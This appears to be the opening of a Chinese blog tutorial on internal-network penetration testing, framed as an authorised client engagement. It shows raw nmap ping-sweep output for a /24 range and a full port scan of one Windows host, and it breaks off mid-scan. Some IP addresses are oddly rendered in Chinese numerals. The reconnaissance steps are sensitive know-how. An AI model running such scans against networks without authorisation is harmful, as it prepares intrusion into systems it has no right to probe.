内网渗透从入门到入狱

场景：

客户要求你对他们内网作一次安全评估，你接了这个活，搞清楚客户需求：（不影响业务，不限制攻击手段，目标是获取服务器权限），给了你一个IP段：10.211.55.1/24

渗透测试流程

信息收集

须要对你的渗透测试环境网络进行配置

探测存活主机

Nmap

(base) ➜ ~ Nmap -Pn 10.211.55.1/24Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CSTNmap scan report for 10.211.55.0Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.0 are filteredNmap scan report for 10.211.55.1Host is up.All 1000 scanned ports on 10.211.55.1 are filtered
Nmap scan report for 10.211.55.2Host is up (0.0013s latency).All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for 10.211.55.4Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.4 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00068s latency).Not shown: 997 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00085s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http
Nmap scan report for 10.211.55.7Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.7 are filtered
Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.0011s latency).Not shown: 991 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknown
Nmap scan report for 10.211.55.9Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.9 are filtered
Nmap scan report for 10.211.55.10Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.10 are filtered
Nmap scan report for 10.211.55.11Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.11 are filtered
Nmap scan report for 10.211.55.12Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.12 are filtered
Nmap scan report for 10.211.55.13Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.13 are filtered
Nmap scan report for 10.211.55.14Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.14 are filtered
Nmap scan report for 10.211.55.15Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.15 are filtered
Nmap scan report for 10.211.55.16Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.16 are filtered
Nmap scan report for 10.211.55.17Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.17 are filtered
Nmap scan report for 10.211.55.18Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.18 are filtered
Nmap scan report for 10.211.55.19Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.19 are filtered
Nmap scan report for 10.211.55.20Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.20 are filtered
Nmap scan report for 10.211.55.21Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.21 are filtered
Nmap scan report for 10.211.55.22Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.22 are filtered
Nmap scan report for 10.211.55.23Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.23 are filtered
Nmap scan report for 10.211.55.24Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.24 are filtered
Nmap scan report for 10.211.55.25Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.25 are filtered
Nmap scan report for 10.211.55.26Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.26 are filtered
Nmap scan report for 10.211.55.27Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.27 are filtered
Nmap scan report for 10.211.55.28Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.28 are filtered
Nmap scan report for 10.211.55.29Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.29 are filtered
Nmap scan report for 10.211.55.30Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.30 are filtered
Nmap scan report for 10.211.55.31Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.31 are filtered
Nmap scan report for 10.211.55.32Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.32 are filtered
Nmap scan report for 10.211.55.33Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.33 are filtered
Nmap scan report for 10.211.55.34Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.34 are filtered
Nmap scan report for 10.211.55.35Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.35 are filtered
Nmap scan report for 10.211.55.36Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.36 are filtered
Nmap scan report for 10.211.55.37Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.37 are filtered
Nmap scan report for 10.211.55.38Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.38 are filtered
Nmap scan report for 10.211.55.39Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.39 are filtered
Nmap scan report for 10.211.55.40Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.40 are filtered
Nmap scan report for 10.211.55.41Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.41 are filtered
Nmap scan report for 10.211.55.42Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.42 are filtered
Nmap scan report for 10.211.55.43Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.43 are filtered
Nmap scan report for 10.211.55.44Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.44 are filtered
Nmap scan report for 10.211.55.45Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.45 are filtered
Nmap scan report for 10.211.55.46Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.46 are filtered
Nmap scan report for 10.211.55.47Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.47 are filtered
Nmap scan report for 10.211.55.48Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.48 are filtered
Nmap scan report for 10.211.55.49Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.49 are filtered
Nmap scan report for 10.211.55.50Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.50 are filtered
Nmap scan report for 10.211.55.51Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.51 are filtered
Nmap scan report for 10.211.55.52Host is up (0.000016s latency).All 1000 scanned ports on 10.211.55.52 are filtered
Nmap scan report for 10.211.55.53Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.53 are filtered
Nmap scan report for 10.211.55.54Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.54 are filtered
Nmap scan report for 10.211.55.55Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.55 are filtered
Nmap scan report for 10.211.55.56Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.56 are filtered
Nmap scan report for 10.211.55.57Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.57 are filtered
Nmap scan report for 10.211.55.58Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.58 are filtered
Nmap scan report for 10.211.55.59Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.59 are filtered
Nmap scan report for 10.211.55.60Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.60 are filtered
Nmap scan report for 10.211.55.61Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.61 are filtered
Nmap scan report for 10.211.55.62Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.62 are filtered
Nmap scan report for 10.211.55.63Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.63 are filtered
Nmap scan report for 10.211.55.64Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.64 are filtered
Nmap scan report for 10.211.55.65Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.65 are filtered
Nmap scan report for 10.211.55.66Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.66 are filtered
Nmap scan report for 10.211.55.67Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.67 are filtered
Nmap scan report for 10.211.55.68Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.68 are filtered
Nmap scan report for 10.211.55.69Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.69 are filtered
Nmap scan report for 10.211.55.70Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.70 are filtered
Nmap scan report for 10.211.55.71Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.71 are filtered
Nmap scan report for 10.211.55.72Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.72 are filtered
Nmap scan report for 10.211.55.73Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.73 are filtered
Nmap scan report for 10.211.55.74Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.74 are filtered
Nmap scan report for 10.211.55.75Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.75 are filtered
Nmap scan report for 10.211.55.76Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.76 are filtered
Nmap scan report for 10.211.55.77Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.77 are filtered
Nmap scan report for 10.211.55.78Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.78 are filtered
Nmap scan report for 10.211.55.79Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.79 are filtered
Nmap scan report for 10.211.55.80Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.80 are filtered
Nmap scan report for 10.211.55.81Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.81 are filtered
Nmap scan report for 10.211.55.82Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.82 are filtered
Nmap scan report for 10.211.55.83Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.83 are filtered
Nmap scan report for 10.211.55.84Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.84 are filtered
Nmap scan report for 10.211.55.85Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.85 are filtered
Nmap scan report for 10.211.55.86Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.86 are filtered
Nmap scan report for 10.211.55.87Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.87 are filtered
Nmap scan report for 10.211.55.88Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.88 are filtered
Nmap scan report for 10.211.55.89Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.89 are filtered
Nmap scan report for 10.211.55.90Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.90 are filtered
Nmap scan report for 10.211.55.91Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.91 are filtered
Nmap scan report for 10.211.55.92Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.92 are filtered
Nmap scan report for 10.211.55.93Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.93 are filtered
Nmap scan report for 10.211.55.94Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.94 are filtered
Nmap scan report for 10.211.55.95Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.95 are filtered
Nmap scan report for 10.211.55.96Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.96 are filtered
Nmap scan report for 10.211.55.97Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.97 are filtered
Nmap scan report for 10.211.55.98Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.98 are filtered
Nmap scan report for 10.211.55.99Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.99 are filtered
Nmap scan report for 10.211.55.100Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.100 are filtered
Nmap scan report for 10.211.55.101Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.101 are filtered
Nmap scan report for 10.211.55.102Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.102 are filtered
Nmap scan report for 10.211.55.103Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.103 are filtered
Nmap scan report for 10.211.55.104Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.104 are filtered
Nmap scan report for 10.211.55.105Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.105 are filtered
Nmap scan report for 10.211.55.106Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.106 are filtered
Nmap scan report for 10.211.55.107Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.107 are filtered
Nmap scan report for 10.211.55.108Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.108 are filtered
Nmap scan report for 10.211.55.109Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.109 are filtered
Nmap scan report for 10.211.55.110Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.110 are filtered
Nmap scan report for 10.211.55.111Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.111 are filtered
Nmap scan report for 10.211.55.112Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.112 are filtered
Nmap scan report for 10.211.55.113Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.113 are filtered
Nmap scan report for 10.211.55.114Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.114 are filtered
Nmap scan report for 10.211.55.115Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.115 are filtered
Nmap scan report for 10.211.55.116Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.116 are filtered
Nmap scan report for 10.211.55.117Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.117 are filtered
Nmap scan report for 10.211.55.118Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.118 are filtered
Nmap scan report for 10.211.55.119Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.119 are filtered
Nmap scan report for 10.211.55.120Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.120 are filtered
Nmap scan report for 10.211.55.121Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.121 are filtered
Nmap scan report for 10.211.55.122Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.122 are filtered
Nmap scan report for 10.211.55.123Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.123 are filtered
Nmap scan report for 10.211.55.124Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.124 are filtered
Nmap scan report for 10.211.55.125Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.125 are filtered
Nmap scan report for 10.211.55.126Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.126 are filtered
Nmap scan report for 10.211.55.127Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.127 are filtered
Nmap scan report for 10.211.55.128Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.128 are filtered
Nmap scan report for 10.211.55.129Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.129 are filtered
Nmap scan report for 10.211.55.130Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.130 are filtered
Nmap scan report for 10.211.55.131Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.131 are filtered
Nmap scan report for 10.211.55.132Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.132 are filtered
Nmap scan report for 10.211.55.133Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.133 are filtered
Nmap scan report for 10.211.55.134Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.134 are filtered
Nmap scan report for 10.211.55.135Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.135 are filtered
Nmap scan report for 10.211.55.136Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.136 are filtered
Nmap scan report for 10.211.55.137Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.137 are filtered
Nmap scan report for 10.211.55.138Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.138 are filtered
Nmap scan report for 10.211.55.139Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.139 are filtered
Nmap scan report for 10.211.55.140Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.140 are filtered
Nmap scan report for 10.211.55.141Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.141 are filtered
Nmap scan report for 10.211.55.142Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.142 are filtered
Nmap scan report for 10.211.55.143Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.143 are filtered
Nmap scan report for 10.211.55.144Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.144 are filtered
Nmap scan report for 10.211.55.145Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.145 are filtered
Nmap scan report for 10.211.55.146Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.146 are filtered
Nmap scan report for 10.211.55.147Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.147 are filtered
Nmap scan report for 10.211.55.148Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.148 are filtered
Nmap scan report for 10.211.55.149Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.149 are filtered
Nmap scan report for 10.211.55.150Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.150 are filtered
Nmap scan report for 10.211.55.151Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.151 are filtered
Nmap scan report for 10.211.55.152Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.152 are filtered
Nmap scan report for 10.211.55.153Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.153 are filtered
Nmap scan report for 10.211.55.154Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.154 are filtered
Nmap scan report for 10.211.55.155Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.155 are filtered
Nmap scan report for 10.211.55.156Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.156 are filtered
Nmap scan report for 10.211.55.157Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.157 are filtered
Nmap scan report for 10.211.55.158Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.158 are filtered
Nmap scan report for 10.211.55.159Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.159 are filtered
Nmap scan report for 10.211.55.160Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.160 are filtered
Nmap scan report for 10.211.55.161Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.161 are filtered
Nmap scan report for 10.211.55.162Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.162 are filtered
Nmap scan report for 10.211.55.163Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.163 are filtered
Nmap scan report for 10.211.55.164Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.164 are filtered
Nmap scan report for 10.211.55.165Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.165 are filtered
Nmap scan report for 10.211.55.166Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.166 are filtered
Nmap scan report for 10.211.55.167Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.167 are filtered
Nmap scan report for 10.211.55.168Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.168 are filtered
Nmap scan report for 10.211.55.169Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.169 are filtered
Nmap scan report for 10.211.55.170Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.170 are filtered
Nmap scan report for 10.211.55.171Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.171 are filtered
Nmap scan report for 10.211.55.172Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.172 are filtered
Nmap scan report for 10.211.55.173Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.173 are filtered
Nmap scan report for 10.211.55.174Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.174 are filtered
Nmap scan report for 10.211.55.175Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.175 are filtered
Nmap scan report for 10.211.55.176Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.176 are filtered
Nmap scan report for 10.211.55.177Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.177 are filtered
Nmap scan report for 10.211.55.178Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.178 are filtered
Nmap scan report for 10.211.55.179Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.179 are filtered
Nmap scan report for 10.211.55.180Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.180 are filtered
Nmap scan report for 10.211.55.181Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.181 are filtered
Nmap scan report for 10.211.55.182Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.182 are filtered
Nmap scan report for 10.211.55.183Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.183 are filtered
Nmap scan report for 10.211.55.184Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.184 are filtered
Nmap scan report for 10.211.55.185Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.185 are filtered
Nmap scan report for 10.211.55.186Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.186 are filtered
Nmap scan report for 10.211.55.187Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.187 are filtered
Nmap scan report for 10.211.55.188Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.188 are filtered
Nmap scan report for 10.211.55.189Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.189 are filtered
Nmap scan report for 10.211.55.190Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.190 are filtered
Nmap scan report for 10.211.55.191Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.191 are filtered
Nmap scan report for 10.211.55.192Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.192 are filtered
Nmap scan report for 10.211.55.193Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.193 are filtered
Nmap scan report for 10.211.55.194Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.194 are filtered
Nmap scan report for 10.211.55.195Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.195 are filtered
Nmap scan report for 10.211.55.196Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.196 are filtered
Nmap scan report for 10.211.55.197Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.197 are filtered
Nmap scan report for 10.211.55.198Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.198 are filtered
Nmap scan report for 10.211.55.199Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.199 are filtered
Nmap scan report for 10.211.55.200Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.200 are filtered
Nmap scan report for 10.211.55.201Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.201 are filtered
Nmap scan report for 10.211.55.202Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.202 are filtered
Nmap scan report for 10.211.55.203Host is up (0.00063s latency).All 1000 scanned ports on 10.211.55.203 are filtered
Nmap scan report for 10.211.55.204Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.204 are filtered
Nmap scan report for 10.211.55.205Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.205 are filtered
Nmap scan report for 10.211.55.206Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.206 are filtered
Nmap scan report for 10.211.55.207Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.207 are filtered
Nmap scan report for 10.211.55.208Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.208 are filtered
Nmap scan report for 10.211.55.209Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.209 are filtered
Nmap scan report for 10.211.55.210Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.210 are filtered
Nmap scan report for 10.211.55.211Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.211 are filtered
Nmap scan report for 10.211.55.212Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.212 are filtered
Nmap scan report for 10.211.55.213Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.213 are filtered
Nmap scan report for 10.211.55.214Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.214 are filtered
Nmap scan report for 10.211.55.215Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.215 are filtered
Nmap scan report for 10.211.55.216Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.216 are filtered
Nmap scan report for 10.211.55.217Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.217 are filtered
Nmap scan report for 10.211.55.218Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.218 are filtered
Nmap scan report for 10.211.55.219Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.219 are filtered
Nmap scan report for 10.211.55.220Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.220 are filtered
Nmap scan report for 10.211.55.221Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.221 are filtered
Nmap scan report for 10.211.55.222Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.222 are filtered
Nmap scan report for 10.211.55.223Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.223 are filtered
Nmap scan report for 10.211.55.224Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.224 are filtered
Nmap scan report for 10.211.55.225Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.225 are filtered
Nmap scan report for 10.211.55.226Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.226 are filtered
Nmap scan report for 10.211.55.227Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.227 are filtered
Nmap scan report for 10.211.55.228Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.228 are filtered
Nmap scan report for 10.211.55.229Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.229 are filtered
Nmap scan report for 10.211.55.230Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.230 are filtered
Nmap scan report for 10.211.55.231Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.231 are filtered
Nmap scan report for 10.211.55.232Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.232 are filtered
Nmap scan report for 10.211.55.233Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.233 are filtered
Nmap scan report for 10.211.55.234Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.234 are filtered
Nmap scan report for 10.211.55.235Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.235 are filtered
Nmap scan report for 10.211.55.236Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.236 are filtered
Nmap scan report for 10.211.55.237Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.237 are filtered
Nmap scan report for 10.211.55.238Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.238 are filtered
Nmap scan report for 10.211.55.239Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.239 are filtered
Nmap scan report for 10.211.55.240Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.240 are filtered
Nmap scan report for 10.211.55.241Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.241 are filtered
Nmap scan report for 10.211.55.242Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.242 are filtered
Nmap scan report for 10.211.55.243Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.243 are filtered
Nmap scan report for 10.211.55.244Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.244 are filtered
Nmap scan report for 10.211.55.245Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.245 are filtered
Nmap scan report for 10.211.55.246Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.246 are filtered
Nmap scan report for 10.211.55.247Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.247 are filtered
Nmap scan report for 10.211.55.248Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.248 are filtered
Nmap scan report for 10.211.55.249Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.249 are filtered
Nmap scan report for 10.211.55.250Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.250 are filtered
Nmap scan report for 10.211.55.251Host is up (0.000032s latency).All 1000 scanned ports on 10.211.55.251 are filtered
Nmap scan report for 10.211.55.252Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.252 are filtered
Nmap scan report for 10.211.55.253Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.253 are filtered
Nmap scan report for 10.211.55.254Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.254 are filtered
Nmap scan report for 10.211.55.255Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.255 are filtered
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds(base) ➜ ~

通过探测发现该IP段有3个存活主机

分别是：10.211.55.五、10.211.55.六、10.211.55.8

对这三个主机进行全端口扫描，查看三台主机开放端口状况

10.211.55.5

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CSTInitiating ARP Ping Scan at 19:37Scanning 10.211.55.5 [1 port]Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:37Scanning windows-10.shared (10.211.55.5) [65535 ports]Discovered open port 135/tcp on 10.211.55.5Discovered open port 139/tcp on 10.211.55.5Discovered open port 445/tcp on 10.211.55.5Discovered open port 49664/tcp on 10.211.55.5Discovered open port 49669/tcp on 10.211.55.5Discovered open port 5040/tcp on 10.211.55.5Discovered open port 49667/tcp on 10.211.55.5Discovered open port 49668/tcp on 10.211.55.5Discovered open port 49665/tcp on 10.211.55.5Discovered open port 49671/tcp on 10.211.55.5Discovered open port 49666/tcp on 10.211.55.5Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00018s latency).Not shown: 65524 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds5040/tcp open unknown49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49671/tcp open unknownMAC Address: 